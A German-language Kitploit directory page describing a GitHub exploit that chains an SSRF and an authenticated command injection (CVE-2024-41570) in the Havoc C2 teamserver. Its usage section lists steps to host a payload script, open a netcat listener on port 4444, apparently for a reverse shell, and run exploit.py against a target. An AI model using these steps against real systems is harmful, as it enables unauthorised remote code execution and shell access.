Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-41570-Havoc-C2-RCE — Dies ist eine verkettete RCE im Havoc C2 Framework unter Verwendung der pocs von github.com/chebuya und github.com/IncludeSecurity | Kitploit
Tools/GitHubGitHub/leo-mitch/cve-2024-41570-havoc-c2-rce
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRed Teaming
GitHubleo-mitch/cve-2024-41570-havoc-c2-rce

CVE-2024-41570-Havoc-C2-RCE

Dies ist eine verkettete RCE im Havoc C2 Framework unter Verwendung der pocs von github.com/chebuya und github.com/IncludeSecurity

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
3vor 1 JahrNoch nicht geprüft

Havoc-C2-RCE (CVE-2024-41570)

Dies ist eine verkettete RCE (CVE-2024-41570) im Havoc C2-Framework.

Befehlseinschleusung: Havoc ist anfällig für Befehlseinschleusung, die es einem authentifizierten Benutzer ermöglicht, Befehle auf dem Teamserver auszuführen. Betroffen sind Versionen 0.3 bis zur neuesten Version 0.6. Das Standardprofil von Havoc enthält hartcodierte Passwörter, sodass ein C2-Betreiber, der unvorsichtig genug ist, das Standardprofil in einem öffentlichen Netzwerk zu verwenden, sofort ausgenutzt werden kann.

SSRF: Diese Schwachstelle wird ausgenutzt, indem eine Dämon-Agent-Registrierung und Checkins gefälscht werden, um einen TCP-Socket auf dem Teamserver zu öffnen und Daten von ihm zu lesen/schreiben. Dies ermöglicht Angreifern, die Ursprungs-IPs von Teamservern und vieles mehr preiszugeben.

Kette: Missbrauch von SSRF, um eine authentifizierte Befehlseinschleusungs-Payload zu liefern.

Verwendung

2025-01-19 20-01-34

root@kitploit:~
1. Modify the IP, USER and PASSWORD in the exploit.py file.
2. Modify IP in payload.sh

-> python3 -m venv myenv && source myenv/bin/activate
-> pip3 install -r requirements.txt
-> chmox +x payload.sh
-> python3 -m http.server (On another terminal)
-> nc -lvnp 4444 (On another terminal)

# Run the exploit
(myenv) -> python3 exploit.py -t https://site.com -i 0.0.0.0 -p 12345

Dank an @chebuya und @Hyperreality

Tool herunterladen